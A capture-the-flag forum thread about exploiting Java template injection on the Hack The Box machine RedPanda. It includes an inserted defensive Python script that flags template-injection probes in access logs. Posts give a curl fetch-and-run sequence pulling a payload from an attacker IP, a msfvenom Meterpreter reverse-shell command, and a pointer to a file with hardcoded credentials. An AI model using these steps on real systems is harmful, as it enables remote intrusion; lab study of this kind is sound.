RedPanda - HTB [Discussion]
Stuck on the SSTI bit. Was able to find injection almost immediately, then found the sweet generator in this thread that handles encoding.

My issue is I can't get a reverse shell no matter what I try. I'm able to encode a ping and catch it in my tcpdump but my nc listener gets no forwarded shell.

How are folks getting callbacks?

Are folks really just reading that app file that has hardcoded creds? If so how did y'all find that?
Reply
(July 11, 2022, 05:23 PM)RF0vmM9n87Go Wrote: Stuck on the SSTI bit. Was able to find injection almost immediately, then found the sweet generator in this thread that handles encoding.

My issue is I can't get a reverse shell no matter what I try. I'm able to encode a ping and catch it in my tcpdump but my nc listener gets no forwarded shell.

How are folks getting callbacks?

Are folks really just reading that app file that has hardcoded creds? If so how did y'all find that?


At first, I tried using a Bash one-liner from here: https://www.revshells.com/. However, I didn't get a callback either. Not sure why.

So I created a reverse shell using msfvenom and then I ran these three commands via the SSTI exploit:

curl http://10.10.14.xxx/shell -o /tmp/shell
chmod u+x /tmp/shell
/tmp/shell
Reply
How did you guys find this SSTI vulnerability?

I ran an active scan with Burp Suite Professional against the search form, but it did not detect this SSTI.

Which web application vulnerability scanner do you use?
Reply
(July 12, 2022, 09:06 AM)Exa Wrote: How did you guys find this SSTI vulnerability?

I ran an active scan with Burp Suite Professional against the search form, but it did not detect this SSTI.

Which web application vulnerability scanner do you use?


Hey, I also use Burp Professional. I found the SSTI pretty much right away; it didn't mark it as SSTI, but it did say that there was template manipulation because of some math it tried (50*50, for example). From there I realized it was Java SSTI because of the framework that the site uses, from looking at the source code.
Reply
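The detection approach described above (a scanner injecting an arithmetic probe such as 50*50 into a template and watching for it to be evaluated) leaves a recognisable footprint in web server access logs. The following is an added example, not code from the thread or from the box, showing how a defender can flag such probes: it parses constructed Common-Log-Format lines (the IPs, paths and timestamps are made up), decodes the request target the way a form-decoding server would, and matches the expression delimiters used by common template engines (`${}`, `*{}`, `#{}` in Spring/SpEL-style expressions, `{{}}` in Jinja2/Twig) around an arithmetic probe. The log format, the `/search?name=` parameter and the regexes are assumptions for the example.

```python
import re
from urllib.parse import unquote_plus

# Constructed sample access-log lines (hypothetical, not from the thread or the box).
# Line 2-4 carry percent-encoded template probes; lines 1 and 5 are benign.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Jul/2022:09:06:01 +0000] "GET /search?name=panda HTTP/1.1" 200 512
10.0.0.9 - - [12/Jul/2022:09:06:07 +0000] "GET /search?name=*%7B50*50%7D HTTP/1.1" 200 498
10.0.0.9 - - [12/Jul/2022:09:06:09 +0000] "GET /search?name=%24%7B7*7%7D HTTP/1.1" 200 498
10.0.0.9 - - [12/Jul/2022:09:06:12 +0000] "GET /search?name=%7B%7B7*7%7D%7D HTTP/1.1" 200 498
10.0.0.7 - - [12/Jul/2022:09:07:30 +0000] "GET /search?name=red+panda HTTP/1.1" 200 512
"""

# Common Log Format prefix: client IP, timestamp, method, request target, status.
REQUEST_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

# An opening template delimiter ("{{" or one of $ * # ~ @ followed by "{"),
# an arithmetic probe like 7*7 or 50-1, and the closing brace(s).
PROBE_RE = re.compile(r'(\{\{|[$*#~@]\{)\s*\d+\s*[*+/-]\s*\d+\s*\}\}?')


def find_ssti_probes(log_text):
    """Return one dict per request whose decoded target contains a template probe."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than fail
        # Decode percent-escapes and treat '+' as a space, exactly as a server
        # decoding application/x-www-form-urlencoded input would, so an encoded
        # probe is matched the same way as a literal one.
        decoded = unquote_plus(m.group("target"))
        p = PROBE_RE.search(decoded)
        if p:
            hits.append({
                "ip": m.group("ip"),
                "ts": m.group("ts"),
                "probe": p.group(0),
                "target": decoded,
            })
    return hits


def probes_per_ip(hits):
    """Count flagged requests per client IP to surface a scanner rather than a one-off."""
    counts = {}
    for h in hits:
        counts[h["ip"]] = counts.get(h["ip"], 0) + 1
    return counts


if __name__ == "__main__":
    found = find_ssti_probes(SAMPLE_LOG)
    for h in found:
        print(f'{h["ts"]} {h["ip"]} probe={h["probe"]!r} target={h["target"]}')
    print("per-IP:", probes_per_ip(found))
```

Because the decoder treats `+` as a space, the same way a form-decoding server does, a literal `+` inside a query parameter never reaches the template as `+`; percent-encoded input is decoded before matching so that encoded probes are not missed. Feeding real logs through `find_ssti_probes` and alerting when `probes_per_ip` shows several hits from one client in a short window is the practical use.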
(July 12, 2022, 09:06 AM)Exa Wrote: How did you guys find this SSTI vulnerability?

I ran an active scan with Burp Suite Professional against the search form, but it did not detect this SSTI.

Which web application vulnerability scanner do you use?


I mostly use ZAP -> https://www.zaproxy.org/

You could run it in aggressive detection mode. Enough for boxes which encourage ethical hacking.
+ lots of plugins.
Reply
(July 11, 2022, 08:39 PM)Exa Wrote:
(July 11, 2022, 05:23 PM)RF0vmM9n87Go Wrote: Stuck on the SSTI bit. Was able to find injection almost immediately, then found the sweet generator in this thread that handles encoding.

My issue is I can't get a reverse shell no matter what I try. I'm able to encode a ping and catch it in my tcpdump but my nc listener gets no forwarded shell.

How are folks getting callbacks?

Are folks really just reading that app file that has hardcoded creds? If so how did y'all find that?


At first, I tried using a Bash one-liner from here: https://www.revshells.com/. However, I didn't get a callback either. Not sure why.

So I created a reverse shell using msfvenom and then I ran these three commands via the SSTI exploit:

curl http://10.10.14.xxx/shell -o /tmp/shell
chmod u+x /tmp/shell
/tmp/shell


I can get a reverse shell with an msfvenom elf file, to either a listening netcat or a Meterpreter handler, but as soon as I enter a command on either the connection drops immediately. Did you find the same?
Reply
(July 13, 2022, 09:09 PM)u01dr22 Wrote: I can get a reverse shell with an msfvenom elf file, to either a listening netcat or a Meterpreter handler, but as soon as I enter a command on either the connection drops immediately. Did you find the same?


I had no such issues. I was using msfvenom -p linux/x64/meterpreter_reverse_tcp -f elf
Reply
(July 14, 2022, 01:30 AM)phuongvy29 Wrote:
(July 13, 2022, 10:56 PM)Exa Wrote:
(July 13, 2022, 09:09 PM)u01dr22 Wrote: I can get a reverse shell with an msfvenom elf file, to either a listening netcat or a Meterpreter handler, but as soon as I enter a command on either the connection drops immediately. Did you find the same?


I had no such issues. I was using msfvenom -p linux/x64/meterpreter_reverse_tcp -f elf


I got stuck with chmod when getting the file from local. It's owned by woodenk but the group is logs, and I cannot add +x.

Update: I used ssti-payload to generate the payload for chmod u+x, and now it's OK, I got a shell.


I was confused too that chmod u+x wasn't working. chmod 700 worked though.
Reply
(July 9, 2022, 09:42 PM)mceye Wrote: cat /opt/panda_search/src/main/java/com/panda_search/htb/panda_search/MainController.java


Do you believe that is the solution path HTB had in mind?
Reply
(July 13, 2022, 10:56 PM)Exa Wrote:
(July 13, 2022, 09:09 PM)u01dr22 Wrote: I can get a reverse shell with an msfvenom elf file, to either a listening netcat or a Meterpreter handler, but as soon as I enter a command on either the connection drops immediately. Did you find the same?


I had no such issues. I was using msfvenom -p linux/x64/meterpreter_reverse_tcp -f elf


Got it working in Metasploit; my handler was set to the default generic one, and changing it to match the payload kept it stable. Cheers.
Reply